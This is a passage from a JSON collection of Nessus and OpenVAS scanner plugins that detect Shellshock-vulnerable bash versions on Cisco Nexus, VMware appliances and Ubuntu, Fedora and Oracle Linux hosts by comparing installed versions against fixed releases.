\"^5\\.0\\(8\\)\"\n ) fixed = '5.0(8a)';\n\n if (\n version =~ \"^5\\.2\\([0-7][A-Za-z]?\\)\" ||\n version =~ \"^5\\.2\\(8[A-Da-d]?\\)\"\n ) fixed = '5.2(8e)';\n\n if (\n version =~ \"^6\\.2\\([0-8][A-Za-z]?\\)\" ||\n version =~ \"^6\\.2\\(9\\)\"\n ) fixed = '6.2(9a)';\n}\n\n# Nexus 1000V, only valid known version affected is 5.2(1)SV3(1.1)\nif (device == 'Nexus' && model =~ \"^1[0-9][0-9][0-9][Vv]$\")\n{\n bug_ID = 'CSCur04438';\n\n if (\n version =~ \"^5\\.2\\(1\\)SV3\\(1\\.1\\)\"\n ) fixed = 'Contact Vendor';\n}\n\n# Nexus 1010, versions affected are 4.2(1)SP1(6.2), and 9.2(1)SP1(4.8)\nif (device == 'Nexus' && model =~ \"^101[0-9]([^0-9]|$)\")\n{\n bug_ID = 'CSCur04510';\n\n if (\n version =~ \"^4\\.2\\(1\\)SP1\\(6\\.2\\)\" ||\n version =~ \"^9\\.2\\(1\\)SP1\\(4\\.8\\)\"\n ) fixed = '5.2(1)SP1(7.2)';\n}\n\n# Nexus 3000 fixed versions 6.0(2)U2(6) / 6.0(2)U3(4) / 6.0(2)U4(2) / 6.0(2)U5(1)\n# Nexus 3500 fixed versions 6.0(2)A3(4) / 6.0(2)A4(2) / 6.0(2)A5(1)\n# The A5 and U5 versions appear to be the first release for those branches.\nif (device == 'Nexus' && model =~ \"^3[0-9][0-9][0-9]([^0-9]|$)\")\n{\n bug_ID = 'CSCur05529';\n\n if (\n version =~ \"^5\\.0\\(3\\)U\" ||\n version =~ \"^6\\.0\\(2\\)U1\\(\" ||\n version =~ \"^6\\.0\\(2\\)U2\\([0-5]\\)\"\n ) fixed = \"6.0(2)U2(6)\";\n\n if (\n version =~ \"^6\\.0\\(2\\)U3\\([0-3]\\)\"\n ) fixed = \"6.0(2)U3(4)\";\n\n if (\n version =~ \"^6\\.0\\(2\\)U4\\([01]\\)\"\n ) fixed = \"6.0(2)U4(2) / 6.0(2)U5(1)\";\n\n if (\n version =~ \"^5\\.0\\(3\\)A\" ||\n version =~ \"^6\\.0\\(2\\)A[12]\\(\" ||\n version =~ \"^6\\.0\\(2\\)A3\\([0-3]\\)\"\n ) fixed = \"6.0(2)A3(4)\";\n\n if (\n version =~ \"^6\\.0\\(2\\)A4\\(1\\)\"\n ) fixed = \"6.0(2)A4(2) / 6.0(2)A5(1)\";\n}\n\n# Nexus 4000 4.1(2)E1(1) known affected release\nif (device == 'Nexus' && model =~ \"^4[0-9][0-9][0-9]([^0-9]|$)\")\n{\n bug_ID = 'CSCur05610';\n\n if (\n version =~ \"^4\\.1\\(2\\)E1\\(1\\)\"\n ) fixed = \"Contact Vendor\";\n}\n\n# Nexus 5000 / 6000, 5.2(1)N1(8a) / 6.0(2)N2(5) / 7.0(3)N1(0.125)\n# 7.0(4)N1(1) / 7.1(0)N1(0.349)\n# Known affected releases\nif (device == 'Nexus' && model =~ \"^56[0-5][0-9][0-9]([^0-9]|$)\")\n{\n bug_ID = 'CSCur05017';\n\n if (\n version =~ \"^5\\.2\\(1\\)N1\\(8a\\)\" ||\n version =~ \"^6\\.0\\(2\\)N2\\(5\\)\" ||\n version =~ \"^7\\.0\\(3\\)N1\\(0\\.125\\)\" ||\n version =~ \"^7\\.0\\(4\\)N1\\(1\\)\" ||\n version =~ \"^7\\.1\\(0\\)N1\\(0\\.349\\)\"\n ) fixed = \"Contact Vendor\";\n}\n\n# Nexus 7000 fixed in 5.2(9a) / 6.1(5a) / 6.2(8b) / 6.2(10) and above\nif (device == 'Nexus' && model =~ \"^7[0-6][0-9][0-9]([^0-9]|$)\")\n{\n bug_ID = 'CSCuq98748';\n\n if (\n version =~ \"^4\\.\" ||\n version =~ \"^5\\.[01]\\(\" ||\n version =~ \"^5\\.2\\([0-9]\\)\"\n ) fixed = \"5.2(9a)\";\n\n if (\n version =~ \"^6\\.0\\(\" ||\n version =~ \"^6\\.1\\([0-4][Aa]?\\)\" ||\n version =~ \"^6\\.1\\(5\\)\"\n ) fixed = \"6.1(5a)\";\n\n if (\n version =~ \"^6\\.2\\([0-8][Aa]?\\)\"\n ) fixed = \"6.2(8b) / 6.2(10)\";\n}\n\n# Nexus 9000 known affected 6.1(2)I2(2b) / 7.2(0.1)VB(0.1)\n# Nexus 9000 ACI version prior to 11.0(1d) affected\nif (device == 'Nexus' && model =~ \"^9[0-6][0-9][0-9]([^0-9]|$)\")\n{\n if (\n version =~ \"^6\\.1\\(2\\)I2\\(2b\\)\" ||\n version =~ \"^7\\.2\\(0\\.1\\)VB\\(0\\.1\\)\"\n )\n {\n bug_ID = 'CSCur02700';\n fixed = \"6.1(2)I3(1)\";\n }\n\n if (\n version =~ \"^11\\.0\\(1[bc]\\)\"\n )\n {\n bug_ID = 'CSCur02102';\n fixed = \"11.0(1d)\";\n }\n}\n\nif (!empty(fixed) && !empty(bug_ID))\n{\n if (report_verbosity > 0)\n {\n report =\n '\\n Cisco bug ID : ' + bug_ID +\n '\\n Model : ' + device + ' ' + model +\n '\\n Installed version : ' + version +\n '\\n Fixed version : ' + fixed +\n '\\n';\n security_hole(port:0, extra:report);\n }\n else security_hole(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 10, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-05-04T23:58:34", "description": "The version of VMware vCenter Server Appliance installed on the remote host is 5.0 prior to Update 3b, 5.1 prior to Update 2b, or 5.5 prior to Update 2a. It therefore contains a version of bash that is affected by a command injection vulnerability via environment variable manipulation. Depending on the configuration of the system, an attacker could remotely execute arbitrary code.", "cvss3": {"score": null, "vector": null}, "published": "2014-10-16T00:00:00", "type": "nessus", "title": "VMware vCenter Server Appliance Bash Remote Code Execution (VMSA-2014-0010) (Shellshock)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2014-6271", "CVE-2014-6277", "CVE-2014-6278", "CVE-2014-7169", "CVE-2014-7186", "CVE-2014-7187"], "modified": "2022-01-31T00:00:00", "cpe": ["cpe:/a:vmware:vcenter_server_appliance"], "id": "VMWARE_VCENTER_SERVER_APPLIANCE_VMSA-2014-0010.NASL", "href": "https://www.tenable.com/plugins/nessus/78508", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude('compat.inc');\n\nif (description)\n{\n script_id(78508);\n script_version(\"1.18\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/01/31\");\n\n script_cve_id(\n \"CVE-2014-6271\",\n \"CVE-2014-6277\",\n \"CVE-2014-6278\",\n \"CVE-2014-7169\",\n \"CVE-2014-7186\",\n \"CVE-2014-7187\"\n );\n script_bugtraq_id(\n 70103,\n 70137,\n 70152,\n 70154,\n 70165,\n 70166\n );\n script_xref(name:\"CERT\", value:\"252743\");\n script_xref(name:\"IAVA\", value:\"2014-A-0142\");\n script_xref(name:\"EDB-ID\", value:\"34765\");\n script_xref(name:\"EDB-ID\", value:\"34766\");\n script_xref(name:\"EDB-ID\", value:\"34777\");\n script_xref(name:\"VMSA\", value:\"2014-0010\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2022/07/28\");\n\n script_name(english:\"VMware vCenter Server Appliance Bash Remote Code Execution (VMSA-2014-0010) (Shellshock)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote host has a virtualization appliance installed that is\naffected by a command injection vulnerability.\");\n script_set_attribute(attribute:\"description\", value:\n\"The version of VMware vCenter Server Appliance installed on the remote\nhost is 5.0 prior to Update 3b, 5.1 prior to Update 2b, or 5.5 prior\nto Update 2a. It therefore contains a version of bash that is affected\nby a command injection vulnerability via environment variable\nmanipulation. Depending on the configuration of the system, an\nattacker could remotely execute arbitrary code.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.vmware.com/security/advisories/VMSA-2014-0010.html\");\n script_set_attribute(attribute:\"see_also\", value:\"http://seclists.org/oss-sec/2014/q3/650\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.invisiblethreat.ca/post/shellshock/\");\n script_set_attribute(attribute:\"solution\", value:\n\"Upgrade to VMware vCenter Server Appliance 5.0 Update 3b / 5.1 Update\n2b / 5.5 Update 2a or later.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2014-7187\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'CUPS Filter Bash Environment Variable Code Injection (Shellshock)');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n script_set_attribute(attribute:\"in_the_news\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2014/09/24\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2014/04/25\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2014/10/16\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:vmware:vcenter_server_appliance\");\n script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Misc.\");\n\n script_copyright(english:\"This script is Copyright (C) 2014-2022 Tenable Network Security, Inc.\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/VMware vCenter Server Appliance/Version\", \"Host/VMware vCenter Server Appliance/Build\");\n script_require_ports(\"Services/ssh\", 22);\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\n\nversion = get_kb_item_or_exit(\"Host/VMware vCenter Server Appliance/Version\");\nbuild = get_kb_item_or_exit(\"Host/VMware vCenter Server Appliance/Build\");\n\nif (version == \"5.0.0\")\n{\n fixed_main_ver = \"5.0.0\";\n fixed_build = 2170782;\n}\nelse if (version == \"5.1.0\")\n{\n fixed_main_ver = \"5.1.0\";\n fixed_build = 2170517;\n}\nelse if (version == \"5.5.0\")\n{\n fixed_main_ver = \"5.5.0\";\n fixed_build = 2170515;\n}\nelse audit(AUDIT_NOT_INST, \"VMware vCenter Server Appliance 5.0.x / 5.1.x / 5.5.x\");\n\nif (int(build) < fixed_build)\n{\n if (report_verbosity > 0)\n {\n report =\n '\\n Installed version : ' + version + ' Build ' + build +\n '\\n Fixed version : ' + fixed_main_ver + ' Build ' + fixed_build + \n '\\n';\n security_hole(port:0, extra:report);\n }\n else security_hole(0);\n exit(0);\n}\nelse audit(AUDIT_INST_VER_NOT_VULN, 'VMware vCenter Server Appliance', version + ' Build ' + build);\n", "cvss": {"score": 10, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-05-04T23:58:14", "description": "The VMware vSphere Replication installed on the remote host is version 5.1.x prior to 5.1.2.2, 5.5.x prior to 5.5.1.3, 5.6.x prior to 5.6.0.2, or 5.8.x prior to 5.8.0.1. It is, therefore, affected by a command injection vulnerability in GNU Bash known as Shellshock, which is due to the processing of trailing strings after function definitions in the values of environment variables. This allows a remote attacker to execute arbitrary code via environment variable manipulation depending on the configuration of the system", "cvss3": {"score": null, "vector": null}, "published": "2014-10-31T00:00:00", "type": "nessus", "title": "VMware vSphere Replication Bash Environment Variable Command Injection Vulnerability (VMSA-2014-0010) (Shellshock)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2014-6271", "CVE-2014-6277", "CVE-2014-6278", "CVE-2014-7169", "CVE-2014-7186", "CVE-2014-7187"], "modified": "2022-01-31T00:00:00", "cpe": ["x-cpe:/a:vmware:vsphere_replication"], "id": "VMWARE_VSPHERE_REPLICATION_VMSA_2014_0010.NASL", "href": "https://www.tenable.com/plugins/nessus/78771", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude('compat.inc');\n\nif (description)\n{\n script_id(78771);\n script_version(\"1.17\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/01/31\");\n\n script_cve_id(\n \"CVE-2014-6271\",\n \"CVE-2014-6277\",\n \"CVE-2014-6278\",\n \"CVE-2014-7169\",\n \"CVE-2014-7186\",\n \"CVE-2014-7187\"\n );\n script_bugtraq_id(\n 70103,\n 70137,\n 70152,\n 70154,\n 70165,\n 70166\n );\n script_xref(name:\"CERT\", value:\"252743\");\n script_xref(name:\"IAVA\", value:\"2014-A-0142\");\n script_xref(name:\"EDB-ID\", value:\"34765\");\n script_xref(name:\"EDB-ID\", value:\"34766\");\n script_xref(name:\"EDB-ID\", value:\"34777\");\n script_xref(name:\"EDB-ID\", value:\"34860\");\n script_xref(name:\"VMSA\", value:\"2014-0010\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2022/07/28\");\n\n script_name(english:\"VMware vSphere Replication Bash Environment Variable Command Injection Vulnerability (VMSA-2014-0010) (Shellshock)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote host has a virtualization appliance installed that is\naffected by Shellshock.\");\n script_set_attribute(attribute:\"description\", value:\n\"The VMware vSphere Replication installed on the remote host is version\n5.1.x prior to 5.1.2.2, 5.5.x prior to 5.5.1.3, 5.6.x prior to\n5.6.0.2, or 5.8.x prior to 5.8.0.1. It is, therefore, affected by a\ncommand injection vulnerability in GNU Bash known as Shellshock, which\nis due to the processing of trailing strings after function\ndefinitions in the values of environment variables. This allows a\nremote attacker to execute arbitrary code via environment variable\nmanipulation depending on the configuration of the system\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.vmware.com/security/advisories/VMSA-2014-0010.html\");\n script_set_attribute(attribute:\"see_also\", value:\"http://seclists.org/oss-sec/2014/q3/650\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.invisiblethreat.ca/post/shellshock/\");\n script_set_attribute(attribute:\"solution\", value:\n\"Upgrade to vSphere Replication 5.1.2.2 / 5.5.1.3 / 5.6.0.2 / 5.8.0.1\nor later.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2014-7187\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'CUPS Filter Bash Environment Variable Code Injection (Shellshock)');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n script_set_attribute(attribute:\"in_the_news\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2014/09/24\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2014/09/30\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2014/10/31\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"x-cpe:/a:vmware:vsphere_replication\");\n script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Misc.\");\n\n script_copyright(english:\"This script is Copyright (C) 2014-2022 Tenable Network Security, Inc.\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/VMware vSphere Replication/Version\");\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\n\nversion = get_kb_item_or_exit(\"Host/VMware vSphere Replication/Version\");\nverui = get_kb_item_or_exit(\"Host/VMware vSphere Replication/VerUI\");\nbuild = get_kb_item_or_exit(\"Host/VMware vSphere Replication/Build\");\n\nfix = '';\n\nif (version =~ '^5\\\\.1\\\\.' && int(build) < 2170306) fix = '5.1.2 Build 2170306';\nelse if (version =~ '^5\\\\.5\\\\.' && int(build) < 2170307) fix = '5.5.1 Build 2170307';\nelse if (version =~ '^5\\\\.6\\\\.' && int(build) < 2172161) fix = '5.6.0 Build 2172161';\nelse if (version =~ '^5\\\\.8\\\\.' && int(build) < 2170514) fix = '5.8.0 Build 2170514';\n\nif (!empty(fix))\n{\n if (report_verbosity > 0)\n {\n report =\n '\\n Installed version : ' + verui +\n '\\n Fixed version : ' + fix + \n '\\n';\n security_hole(port:0, extra:report);\n }\n else security_hole(0);\n exit(0);\n}\nelse audit(AUDIT_INST_VER_NOT_VULN, 'VMware vSphere Replication', verui);\n", "cvss": {"score": 10, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "openvas": [{"lastseen": "2019-05-29T18:37:47", "description": "The remote host is missing an update for the ", "cvss3": {}, "published": "2014-10-01T00:00:00", "type": "openvas", "title": "Ubuntu Update for bash USN-2363-1", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2014-7169"], "modified": "2019-03-13T00:00:00", "id": "OPENVAS:1361412562310841987", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310841987", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: gb_ubuntu_USN_2363_1.nasl 14140 2019-03-13 12:26:09Z cfischer $\n#\n# Ubuntu Update for bash USN-2363-1\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (C) 2014 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.841987\");\n script_version(\"$Revision: 14140 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2019-03-13 13:26:09 +0100 (Wed, 13 Mar 2019) $\");\n script_tag(name:\"creation_date\", value:\"2014-10-01 16:57:38 +0530 (Wed, 01 Oct 2014)\");\n script_cve_id(\"CVE-2014-7169\");\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_name(\"Ubuntu Update for bash USN-2363-1\");\n script_tag(name:\"insight\", value:\"Tavis Ormandy discovered that the security fix for Bash included in\nUSN-2362-1 was incomplete. An attacker could use this issue to bypass\ncertain environment restrictions. (CVE-2014-7169)\");\n script_tag(name:\"affected\", value:\"bash on Ubuntu 14.04 LTS,\n Ubuntu 12.04 LTS,\n Ubuntu 10.04 LTS\");\n script_tag(name:\"solution\", value:\"Please Install the Updated Packages.\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n\n script_xref(name:\"USN\", value:\"2363-1\");\n script_xref(name:\"URL\", value:\"http://www.ubuntu.com/usn/usn-2363-1/\");\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'bash'\n package(s) announced via the referenced advisory.\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2014 Greenbone Networks GmbH\");\n script_family(\"Ubuntu Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/ubuntu_linux\", \"ssh/login/packages\", re:\"ssh/login/release=UBUNTU(14\\.04 LTS|12\\.04 LTS|10\\.04 LTS)\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-deb.inc\");\n\nrelease = dpkg_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\n\nif(release == \"UBUNTU14.04 LTS\")\n{\n\n if ((res = isdpkgvuln(pkg:\"bash\", ver:\"4.3-7ubuntu1.2\", rls:\"UBUNTU14.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n\n\nif(release == \"UBUNTU12.04 LTS\")\n{\n\n if ((res = isdpkgvuln(pkg:\"bash\", ver:\"4.2-2ubuntu2.3\", rls:\"UBUNTU12.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n\n\nif(release == \"UBUNTU10.04 LTS\")\n{\n\n if ((res = isdpkgvuln(pkg:\"bash\", ver:\"4.1-2ubuntu3.2\", rls:\"UBUNTU10.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-05-29T18:37:13", "description": "Check the version of bash", "cvss3": {}, "published": "2014-10-06T00:00:00", "type": "openvas", "title": "Fedora Update for bash FEDORA-2014-12202", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2014-7169"], "modified": "2019-03-15T00:00:00", "id": "OPENVAS:1361412562310868358", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310868358", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Fedora Update for bash FEDORA-2014-12202\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (C) 2014 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.868358\");\n script_version(\"$Revision: 14223 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2019-03-15 14:49:35 +0100 (Fri, 15 Mar 2019) $\");\n script_tag(name:\"creation_date\", value:\"2014-10-06 05:56:22 +0200 (Mon, 06 Oct 2014)\");\n script_cve_id(\"CVE-2014-7169\");\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_name(\"Fedora Update for bash FEDORA-2014-12202\");\n script_tag(name:\"summary\", value:\"Check the version of bash\");\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n script_tag(name:\"affected\", value:\"bash on Fedora 20\");\n script_tag(name:\"solution\", value:\"Please install the updated package(s).\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_xref(name:\"FEDORA\", value:\"2014-12202\");\n script_xref(name:\"URL\", value:\"https://lists.fedoraproject.org/pipermail/package-announce/2014-October/139900.html\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2014 Greenbone Networks GmbH\");\n script_family(\"Fedora Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/fedora\", \"ssh/login/rpms\", re:\"ssh/login/release=FC20\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\n\nif(release == \"FC20\")\n{\n\n if ((res = isrpmvuln(pkg:\"bash\", rpm:\"bash~4.2.51~2.fc20\", rls:\"FC20\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-05-29T18:36:55", "description": "Oracle Linux Local Security Checks ELSA-2014-3077", "cvss3": {}, "published": "2015-10-06T00:00:00", "type": "openvas", "title": "Oracle Linux Local Check: ELSA-2014-3077", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2014-7169"], "modified": "2018-09-28T00:00:00", "id": "OPENVAS:1361412562310123301", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310123301", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: ELSA-2014-3077.nasl 11688 2018-09-28 13:36:28Z cfischer $\n#\n# Oracle Linux Local Check\n#\n# Authors:\n# Eero Volotinen <eero.volotinen@solinor.com>\n#\n# Copyright:\n# Copyright (c) 2015 Eero Volotinen, http://solinor.com\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.123301\");\n script_version(\"$Revision: 11688 $\");\n script_tag(name:\"creation_date\", value:\"2015-10-06 14:01:58 +0300 (Tue, 06 Oct 2015)\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-09-28 15:36:28 +0200 (Fri, 28 Sep 2018) $\");\n script_name(\"Oracle Linux Local Check: ELSA-2014-3077\");\n script_tag(name:\"insight\", value:\"ELSA-2014-3077 - bash security update. Please see the references for more insight.\");\n script_tag(name:\"solution\", value:\"Update the affected packages to the latest available version.\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"summary\", value:\"Oracle Linux Local Security Checks ELSA-2014-3077\");\n script_xref(name:\"URL\", value:\"http://linux.oracle.com/errata/ELSA-2014-3077.html\");\n script_cve_id(\"CVE-2014-7169\");\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/oracle_linux\", \"ssh/login/release\", re:\"ssh/login/release=OracleLinux5\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Eero Volotinen\");\n script_family(\"Oracle Linux Local Security Checks\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release) exit(0);\n\nres = \"\";\n\nif(release == \"OracleLinux5\")\n{\n if ((res = isrpmvuln(pkg:\"bash\", rpm:\"bash~3.2~33.el5.1.0.1\", rls:\"OracleLinux5\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n\n}\nif (__pkg_match) exit(99);\n exit(0);\n\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-05-29T18:36:44", "description": "Oracle Linux Local Security Checks ELSA-2014-3075", "cvss3": {}, "published": "2015-10-06T00:00:00", "type": "openvas", "title": "Oracle Linux Local Check: ELSA-2014-3075", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2014-7169"], "modified": "2018-09-28T00:00:00", "id": "OPENVAS:1361412562310123302", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310123302", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: ELSA-2014-3075.nasl 11688 2018-09-28 13:36:28Z cfischer $\n#\n# Oracle Linux Local Check\n#\n# Authors:\n# Eero Volotinen <eero.volotinen@solinor.com>\n#\n# Copyright:\n# Copyright (c) 2015 Eero Volotinen, http://solinor.com\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.123302\");\n script_version(\"$Revision: 11688 $\");\n script_tag(name:\"creation_date\", value:\"2015-10-06 14:01:59 +0300 (Tue, 06 Oct 2015)\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-09-28 15:36:28 +0200 (Fri, 28 Sep 2018) $\");\n script_name(\"Oracle Linux Local Check: ELSA-2014-3075\");\n script_tag(name:\"insight\", value:\"ELSA-2014-3075 - bash security update. Please see the references for more insight.\");\n script_tag(name:\"solution\", value:\"Update the affected packages to the latest available version.\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n 